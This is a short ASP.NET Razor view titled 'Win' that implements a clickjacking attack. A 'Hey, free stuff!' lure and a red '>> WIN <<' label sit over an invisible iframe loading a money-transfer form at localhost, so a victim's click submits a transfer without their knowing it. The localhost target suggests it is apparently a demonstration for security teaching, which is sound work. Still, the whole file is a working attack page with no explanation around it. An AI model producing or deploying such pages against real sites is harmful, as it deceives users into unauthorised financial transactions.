@{
    ViewData["Title"] = "Win";
}

<h1>Win</h1>


<div style="position: absolute; left: 120px; top: 120px;">Hey, free stuff!</div>

<div style="position: absolute; left: 272px; top: 685px; color: red; font-weight: bold;">>> WIN <<</div>
<iframe style="opacity: 0;" height="800" width="680" scrolling="no" src="https://localhost:5001/Transfer/CreateTransfer"></iframe>